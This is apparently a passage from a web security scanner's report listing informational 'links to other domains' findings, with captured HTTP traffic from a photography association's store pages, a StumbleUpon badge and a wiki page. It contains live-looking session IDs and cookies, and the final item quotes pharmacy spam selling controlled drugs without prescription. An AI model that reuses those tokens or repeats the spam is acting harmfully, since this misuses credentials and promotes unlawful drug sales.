https://www.nanpa.org/startup_rc.js

Request

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:14:18 GMT
Connection: close
Last-Modified: Thu, 12 May 2011 00:14:18 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 30805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head
...[SNIP]...
<meta name="copyright" content="HTML, CSS, and Javascript Copyright 1997-2009, Relevant Arts Enterprise, Inc."/>
<script language="javascript" type="text/javascript" src="https://www.nanpa.org/startup_rc.js">

...[SNIP]...
<div align="center"><img src="https://www.nanpa.org/img/NANPA_bar.gif" width="475" height="35" alt="North American Nature Photography Association"/></div>
...[SNIP]...
<td class="head_margin">
<img src="https://www.nanpa.org/img/spacer.gif" width="15" height="1" alt=""/><br/>
</td>
<td class="logo">
<a href="http://www.nanpa.org/index.php"><img src="https://www.nanpa.org/img/NANPA_Logo.gif" width="170" height="83" alt="NANPA" title="NANPA Home"/></a>
...[SNIP]...
<div class="tagline">
<img src="https://www.nanpa.org/img/NANPA_tagline.gif" width="500" height="19" alt="Connecting The Nature Photography Community"/><br/>
...[SNIP]...
<div style="padding: 3px 0px 3px 0px"><a href="http://www.nanpa.org/contact.php" title="Contact NANPA">contact</a> | <a href="http://www.nanpa.org/sitemap.php" title="Website Map">sitemap</a> | <a href="http://www.nanpa.org/index.php" title="Home Page">home</a>
...[SNIP]...
</a>
<a href="https://www.addthis.com/bookmark.php?v=250" class="addthis_button_compact">Share...</a>
</div>
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
<td class="head_margin">
<img src="https://www.nanpa.org/img/spacer.gif" width="15" height="1" alt=""/><br/>
...[SNIP]...
<td class="main_margin"><img src="https://www.nanpa.org/img/spacer.gif" width="11" /> </td>
...[SNIP]...
<a onclick="toggle_login_box()" class="login_close"><img src="https://www.nanpa.org/img/xbox_white.gif" alt="Close" title="Close" width="14" height="14" align="right" /></a>
...[SNIP]...
<div id="about_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('about_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/about_overview.php">About NANPA</a>
...[SNIP]...
<div id="benefits_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('benefits_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/benefits_overview.php">Benefits</a>
...[SNIP]...
<div id="publications_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('publications_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/publications_overview.php">Publications</a>
...[SNIP]...
<div id="positions_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('positions_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/positions_overview.php">Position Statements</a>
...[SNIP]...
<div id="events_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('events_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/events_overview.php">Events</a>
...[SNIP]...
<div id="awards_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('awards_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/awards_overview.php">Awards & Grants</a>
...[SNIP]...
<div id="photography_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('photography_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/photography_overview.php">Photography</a>
...[SNIP]...
<div id="education_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('education_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/education_overview.php">Education</a>
...[SNIP]...
<div id="environment_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('environment_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/environment_overview.php">Environment</a>
...[SNIP]...
<div id="support_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('support_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/support_overview.php">Support NANPA</a>
...[SNIP]...
<div id="members_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('members_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="https://www.nanpa.org/members.php">Members</a>
...[SNIP]...
<div id="networking_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('networking_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/networking_overview.php">Networking</a>
...[SNIP]...
<div id="tools_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('tools_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/site_tools.php">Website Tools</a>
...[SNIP]...
<a href="https://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/join/intro.html?Action=Join"><img src="https://www.nanpa.org/img/joinNANPA.gif" width="170" height="50" alt="Join NANPA!" title="Join NANPA!" style="margin-bottom:10px"/></a>
...[SNIP]...
<td class="footer_margin" width="15"><img src="https://www.nanpa.org/img/spacer.gif" width="15" height="1" /></td>
<td class="footer_left" width="170"><img src="https://www.nanpa.org/img/spacer.gif" width="170" height="1" /></td>
...[SNIP]...
<br/>
©
<script language="javascript" type="text/javascript" src="https://www.nanpa.org/javascript/curr_year.js">

...[SNIP]...
<br />

<a href="https://www.nanpa.org/copyrights.php">All Rights Reserved</a>
...[SNIP]...
<td width="168" class="footer_right"><img src="https://www.nanpa.org/img/spacer.gif" width="168" height="1" />
<div class="font_icons"><a href="javascript:font_inc()"><img src="https://www.nanpa.org/img/A_plus.gif" width="24" height="18" alt="Increase" title="Increase"/></a><a href="javascript:font_dec()"><img src="https://www.nanpa.org/img/A_minus.gif" width="24" height="18" alt="Decrease" title="Decrease"/></a><a href="javascript:set_default('12')"><img src="https://www.nanpa.org/img/A_zero.gif" width="24" height="18" alt="Reset" title="Reset"/></a>
...[SNIP]...
<br/>

<a href="https://www.nanpa.org/help.php">Help with Website</a>
...[SNIP]...
<br/>
<a href="https://www.nanpa.org/legal.php">Legal statement</a>
...[SNIP]...
<td class="footer_margin" width="15"><img src="https://www.nanpa.org/img/spacer.gif" width="15" height="1"/></td>
...[SNIP]...

18.33. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resourcenter.net
Path:	/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store

The response contains the following links to other domains:

http://www.nanpa.org/about_overview.php
http://www.nanpa.org/awards_overview.php
http://www.nanpa.org/benefits_overview.php
http://www.nanpa.org/contact.php
http://www.nanpa.org/education_overview.php
http://www.nanpa.org/environment_overview.php
http://www.nanpa.org/events_overview.php
http://www.nanpa.org/index.php
http://www.nanpa.org/networking_overview.php
http://www.nanpa.org/photography_overview.php
http://www.nanpa.org/positions_overview.php
http://www.nanpa.org/publications_overview.php
http://www.nanpa.org/site_tools.php
http://www.nanpa.org/sitemap.php
http://www.nanpa.org/support_overview.php
https://s7.addthis.com/js/250/addthis_widget.js
https://www.addthis.com/bookmark.php?v=250
https://www.nanpa.org/copyrights.php
https://www.nanpa.org/help.php
https://www.nanpa.org/img/A_minus.gif
https://www.nanpa.org/img/A_plus.gif
https://www.nanpa.org/img/A_zero.gif
https://www.nanpa.org/img/NANPA_Logo.gif
https://www.nanpa.org/img/NANPA_bar.gif
https://www.nanpa.org/img/NANPA_tagline.gif
https://www.nanpa.org/img/joinNANPA.gif
https://www.nanpa.org/img/spacer.gif
https://www.nanpa.org/img/xbox_white.gif
https://www.nanpa.org/javascript/curr_year.js
https://www.nanpa.org/legal.php
https://www.nanpa.org/members.php
https://www.nanpa.org/startup_rc.js

Request

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:13:38 GMT
Set-Cookie: SessionID=12387722t57wa9af1j74hos45z8o98ffd44jq45yyc2g314874sb627q4yk50a2g;Path=/
Connection: close
Last-Modified: Thu, 12 May 2011 00:13:38 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 18909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<meta name="copyright" content="HTML, CSS, and Javascript Copyright 1997-2009, Relevant Arts Enterprise, Inc."/>
<script language="javascript" type="text/javascript" src="https://www.nanpa.org/startup_rc.js">

...[SNIP]...
<div align="center"><img src="https://www.nanpa.org/img/NANPA_bar.gif" width="475" height="35" alt="North American Nature Photography Association"/></div>
...[SNIP]...
<td class="head_margin">
<img src="https://www.nanpa.org/img/spacer.gif" width="15" height="1" alt=""/><br/>
</td>
<td class="logo">
<a href="http://www.nanpa.org/index.php"><img src="https://www.nanpa.org/img/NANPA_Logo.gif" width="170" height="83" alt="NANPA" title="NANPA Home"/></a>
...[SNIP]...
<div class="tagline">
<img src="https://www.nanpa.org/img/NANPA_tagline.gif" width="500" height="19" alt="Connecting The Nature Photography Community"/><br/>
...[SNIP]...
<div style="padding: 3px 0px 3px 0px"><a href="http://www.nanpa.org/contact.php" title="Contact NANPA">contact</a> | <a href="http://www.nanpa.org/sitemap.php" title="Website Map">sitemap</a> | <a href="http://www.nanpa.org/index.php" title="Home Page">home</a>
...[SNIP]...
</a>
<a href="https://www.addthis.com/bookmark.php?v=250" class="addthis_button_compact">Share...</a>
</div>
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
<td class="head_margin">
<img src="https://www.nanpa.org/img/spacer.gif" width="15" height="1" alt=""/><br/>
...[SNIP]...
<td class="main_margin"><img src="https://www.nanpa.org/img/spacer.gif" width="11" /> </td>
...[SNIP]...
<a onclick="toggle_login_box()" class="login_close"><img src="https://www.nanpa.org/img/xbox_white.gif" alt="Close" title="Close" width="14" height="14" align="right" /></a>
...[SNIP]...
<div id="about_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('about_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/about_overview.php">About NANPA</a>
...[SNIP]...
<div id="benefits_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('benefits_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/benefits_overview.php">Benefits</a>
...[SNIP]...
<div id="publications_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('publications_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/publications_overview.php">Publications</a>
...[SNIP]...
<div id="positions_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('positions_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/positions_overview.php">Position Statements</a>
...[SNIP]...
<div id="events_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('events_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/events_overview.php">Events</a>
...[SNIP]...
<div id="awards_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('awards_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/awards_overview.php">Awards & Grants</a>
...[SNIP]...
<div id="photography_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('photography_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/photography_overview.php">Photography</a>
...[SNIP]...
<div id="education_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('education_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/education_overview.php">Education</a>
...[SNIP]...
<div id="environment_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('environment_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/environment_overview.php">Environment</a>
...[SNIP]...
<div id="support_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('support_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/support_overview.php">Support NANPA</a>
...[SNIP]...
<div id="members_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('members_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="https://www.nanpa.org/members.php">Members</a>
...[SNIP]...
<div id="networking_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('networking_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/networking_overview.php">Networking</a>
...[SNIP]...
<div id="tools_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('tools_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/site_tools.php">Website Tools</a>
...[SNIP]...
<a href="https://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/join/intro.html?Action=Join"><img src="https://www.nanpa.org/img/joinNANPA.gif" width="170" height="50" alt="Join NANPA!" title="Join NANPA!" style="margin-bottom:10px"/></a>
...[SNIP]...
<td class="footer_margin" width="15"><img src="https://www.nanpa.org/img/spacer.gif" width="15" height="1" /></td>
<td class="footer_left" width="170"><img src="https://www.nanpa.org/img/spacer.gif" width="170" height="1" /></td>
...[SNIP]...
<br/>
©
<script language="javascript" type="text/javascript" src="https://www.nanpa.org/javascript/curr_year.js">

...[SNIP]...
<br />

<a href="https://www.nanpa.org/copyrights.php">All Rights Reserved</a>
...[SNIP]...
<td width="168" class="footer_right"><img src="https://www.nanpa.org/img/spacer.gif" width="168" height="1" />
<div class="font_icons"><a href="javascript:font_inc()"><img src="https://www.nanpa.org/img/A_plus.gif" width="24" height="18" alt="Increase" title="Increase"/></a><a href="javascript:font_dec()"><img src="https://www.nanpa.org/img/A_minus.gif" width="24" height="18" alt="Decrease" title="Decrease"/></a><a href="javascript:set_default('12')"><img src="https://www.nanpa.org/img/A_zero.gif" width="24" height="18" alt="Reset" title="Reset"/></a>
...[SNIP]...
<br/>

<a href="https://www.nanpa.org/help.php">Help with Website</a>
...[SNIP]...
<br/>
<a href="https://www.nanpa.org/legal.php">Legal statement</a>
...[SNIP]...
<td class="footer_margin" width="15"><img src="https://www.nanpa.org/img/spacer.gif" width="15" height="1"/></td>
...[SNIP]...

18.34. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resourcenter.net
Path:	/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html?Action=Find_Store_Items&Time=-1775958525&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s

The response contains the following links to other domains:

http://www.nanpa.org/about_overview.php
http://www.nanpa.org/awards_overview.php
http://www.nanpa.org/benefits_overview.php
http://www.nanpa.org/contact.php
http://www.nanpa.org/education_overview.php
http://www.nanpa.org/environment_overview.php
http://www.nanpa.org/events_overview.php
http://www.nanpa.org/index.php
http://www.nanpa.org/networking_overview.php
http://www.nanpa.org/photography_overview.php
http://www.nanpa.org/positions_overview.php
http://www.nanpa.org/publications_overview.php
http://www.nanpa.org/site_tools.php
http://www.nanpa.org/sitemap.php
http://www.nanpa.org/support_overview.php
https://s7.addthis.com/js/250/addthis_widget.js
https://www.addthis.com/bookmark.php?v=250
https://www.nanpa.org/copyrights.php
https://www.nanpa.org/help.php
https://www.nanpa.org/img/A_minus.gif
https://www.nanpa.org/img/A_plus.gif
https://www.nanpa.org/img/A_zero.gif
https://www.nanpa.org/img/NANPA_Logo.gif
https://www.nanpa.org/img/NANPA_bar.gif
https://www.nanpa.org/img/NANPA_tagline.gif
https://www.nanpa.org/img/joinNANPA.gif
https://www.nanpa.org/img/spacer.gif
https://www.nanpa.org/img/xbox_white.gif
https://www.nanpa.org/javascript/curr_year.js
https://www.nanpa.org/legal.php
https://www.nanpa.org/members.php
https://www.nanpa.org/startup_rc.js

Request

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:14:02 GMT
Connection: close
Last-Modified: Thu, 12 May 2011 00:14:02 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 27135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<meta name="copyright" content="HTML, CSS, and Javascript Copyright 1997-2009, Relevant Arts Enterprise, Inc."/>
<script language="javascript" type="text/javascript" src="https://www.nanpa.org/startup_rc.js">

...[SNIP]...
<div align="center"><img src="https://www.nanpa.org/img/NANPA_bar.gif" width="475" height="35" alt="North American Nature Photography Association"/></div>
...[SNIP]...
<td class="head_margin">
<img src="https://www.nanpa.org/img/spacer.gif" width="15" height="1" alt=""/><br/>
</td>
<td class="logo">
<a href="http://www.nanpa.org/index.php"><img src="https://www.nanpa.org/img/NANPA_Logo.gif" width="170" height="83" alt="NANPA" title="NANPA Home"/></a>
...[SNIP]...
<div class="tagline">
<img src="https://www.nanpa.org/img/NANPA_tagline.gif" width="500" height="19" alt="Connecting The Nature Photography Community"/><br/>
...[SNIP]...
<div style="padding: 3px 0px 3px 0px"><a href="http://www.nanpa.org/contact.php" title="Contact NANPA">contact</a> | <a href="http://www.nanpa.org/sitemap.php" title="Website Map">sitemap</a> | <a href="http://www.nanpa.org/index.php" title="Home Page">home</a>
...[SNIP]...
</a>
<a href="https://www.addthis.com/bookmark.php?v=250" class="addthis_button_compact">Share...</a>
</div>
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
<td class="head_margin">
<img src="https://www.nanpa.org/img/spacer.gif" width="15" height="1" alt=""/><br/>
...[SNIP]...
<td class="main_margin"><img src="https://www.nanpa.org/img/spacer.gif" width="11" /> </td>
...[SNIP]...
<a onclick="toggle_login_box()" class="login_close"><img src="https://www.nanpa.org/img/xbox_white.gif" alt="Close" title="Close" width="14" height="14" align="right" /></a>
...[SNIP]...
<div id="about_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('about_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/about_overview.php">About NANPA</a>
...[SNIP]...
<div id="benefits_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('benefits_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/benefits_overview.php">Benefits</a>
...[SNIP]...
<div id="publications_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('publications_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/publications_overview.php">Publications</a>
...[SNIP]...
<div id="positions_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('positions_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/positions_overview.php">Position Statements</a>
...[SNIP]...
<div id="events_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('events_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/events_overview.php">Events</a>
...[SNIP]...
<div id="awards_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('awards_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/awards_overview.php">Awards & Grants</a>
...[SNIP]...
<div id="photography_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('photography_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/photography_overview.php">Photography</a>
...[SNIP]...
<div id="education_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('education_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/education_overview.php">Education</a>
...[SNIP]...
<div id="environment_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('environment_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/environment_overview.php">Environment</a>
...[SNIP]...
<div id="support_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('support_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/support_overview.php">Support NANPA</a>
...[SNIP]...
<div id="members_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('members_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="https://www.nanpa.org/members.php">Members</a>
...[SNIP]...
<div id="networking_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('networking_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/networking_overview.php">Networking</a>
...[SNIP]...
<div id="tools_div" class="navbutton_off" onmouseover="this.className='navbutton_on';showmenu('tools_menu','1')" onmouseout="this.className='navbutton_off';hidemenu()">
<a href="http://www.nanpa.org/site_tools.php">Website Tools</a>
...[SNIP]...
<a href="https://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/join/intro.html?Action=Join"><img src="https://www.nanpa.org/img/joinNANPA.gif" width="170" height="50" alt="Join NANPA!" title="Join NANPA!" style="margin-bottom:10px"/></a>
...[SNIP]...
<td class="footer_margin" width="15"><img src="https://www.nanpa.org/img/spacer.gif" width="15" height="1" /></td>
<td class="footer_left" width="170"><img src="https://www.nanpa.org/img/spacer.gif" width="170" height="1" /></td>
...[SNIP]...
<br/>
©
<script language="javascript" type="text/javascript" src="https://www.nanpa.org/javascript/curr_year.js">

...[SNIP]...
<br />

<a href="https://www.nanpa.org/copyrights.php">All Rights Reserved</a>
...[SNIP]...
<td width="168" class="footer_right"><img src="https://www.nanpa.org/img/spacer.gif" width="168" height="1" />
<div class="font_icons"><a href="javascript:font_inc()"><img src="https://www.nanpa.org/img/A_plus.gif" width="24" height="18" alt="Increase" title="Increase"/></a><a href="javascript:font_dec()"><img src="https://www.nanpa.org/img/A_minus.gif" width="24" height="18" alt="Decrease" title="Decrease"/></a><a href="javascript:set_default('12')"><img src="https://www.nanpa.org/img/A_zero.gif" width="24" height="18" alt="Reset" title="Reset"/></a>
...[SNIP]...
<br/>

<a href="https://www.nanpa.org/help.php">Help with Website</a>
...[SNIP]...
<br/>
<a href="https://www.nanpa.org/legal.php">Legal statement</a>
...[SNIP]...
<td class="footer_margin" width="15"><img src="https://www.nanpa.org/img/spacer.gif" width="15" height="1"/></td>
...[SNIP]...

18.35. http://www.stumbleupon.com/badge/embed/1/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stumbleupon.com
Path:	/badge/embed/1/

Issue detail

The page was loaded from a URL containing a query string:

http://www.stumbleupon.com/badge/embed/1/?url=http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F

The response contains the following links to other domains:

http://cdn.stumble-upon.com/css/badges_su.css?v=20110511
http://cdn.stumble-upon.com/js/badge_su.js?v=20110511

Request

GET /badge/embed/1/?url=http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F HTTP/1.1
Host: www.stumbleupon.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmf_i=4978204034dc82e628d10f2.45366819; cmf_spr=A%2FN; cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2F; su_conf=33e75ff09dd601bbe69f351039152189; __utmz=189632489.1304964711.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); su_visitorid=129409943%7Cebdeb97cb1676374c151b3c1687a96f6; su_c=28a75dd4ade42afdef0de3985f50ca5c%7C%7C50%7C%7C1304964706%7C3659c970b128684d688c3ff44795c841; __utma=189632489.1867389869.1304964711.1304967080.1304972266.3; __utmv=189632489.|1=user_class=v=1,

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 00:48:21 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 1291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>


           <link rel="stylesheet" href="http://cdn.stumble-upon.com/css/badges_su.css?v=20110511" type="text/css" media="screen, projection" />

                       <script type="text/javascript" src="http://cdn.stumble-upon.com/js/badge_su.js?v=20110511"></script>
...[SNIP]...

18.36. http://www.virtual-phone-number.org/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.virtual-phone-number.org
Path:	/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.virtual-phone-number.org/index.php?title=Local_Number_Portability_(LNP)&redirect=no

The response contains the following links to other domains:

http://comunidad.terra.es/blogs/ambien/archive/2011/05/05/buyambienonline.aspx
http://comunidad.terra.es/blogs/buyxanax/archive/2011/05/05/buyxanaxonline.aspx
http://comunidad.terra.es/blogs/cialis/archive/2011/05/05/comprarcialisonline.aspx
http://comunidad.terra.es/blogs/phentermine/archive/2011/05/05/buyphentermineonline.aspx
http://comunidad.terra.es/blogs/valium/archive/2011/05/05/buyvaliumonline.aspx
http://comunidad.terra.es/blogs/viagra/archive/2011/05/05/comprarviagragenricasinrecetaonline.aspx
http://forums.healthcentral.com/discussion/sleep-disorders/forums?a=tpc&s=2361022&f=3181022&m=216102351
http://forums.healthcentral.com/discussion/sleep-disorders/forums?a=tpc&s=2361022&f=3181022&m=656102351
http://forums.healthcentral.com/discussion/sleep-disorders/forums?a=tpc&s=2361022&f=3181022&m=747102351
http://forums.healthcentral.com/discussion/sleep-disorders/forums?a=tpc&s=2361022&f=3181022&m=763102351
http://www.mediawiki.org/

Request

GET /index.php?title=Local_Number_Portability_(LNP)&redirect=no HTTP/1.1
Host: www.virtual-phone-number.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:14 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.2.6
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 11 May 2011 06:06:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
<p><a href="http://comunidad.terra.es/blogs/ambien/archive/2011/05/05/buyambienonline.aspx#44752" class="external free" title="http://comunidad.terra.es/blogs/ambien/archive/2011/05/05/buyambienonline.aspx#44752" rel="nofollow">http://comunidad.terra.es/blogs/ambien/archive/2011/05/05/buyambienonline.aspx#44752</a> us pharmacies offering ambien without prescription - how can i buy ambien cr without a prescription <a href="http://comunidad.terra.es/blogs/valium/archive/2011/05/05/buyvaliumonline.aspx#95568" class="external free" title="http://comunidad.terra.es/blogs/valium/archive/2011/05/05/buyvaliumonline.aspx#95568" rel="nofollow">http://comunidad.terra.es/blogs/valium/archive/2011/05/05/buyvaliumonline.aspx#95568</a> buy valium suppositories - buy valium madre natura <a href="http://comunidad.terra.es/blogs/phentermine/archive/2011/05/05/buyphentermineonline.aspx#90267" class="external free" title="http://comunidad.terra.es/blogs/phentermine/archive/2011/05/05/buyphentermineonline.aspx#90267" rel="nofollow">http://comunidad.terra.es/blogs/phentermine/archive/2011/05/05/buyphentermineonline.aspx#90267</a> order phentermine on line - legit sites to order phentermine without prescription <a href="http://comunidad.terra.es/blogs/buyxanax/archive/2011/05/05/buyxanaxonline.aspx#22919" class="external free" 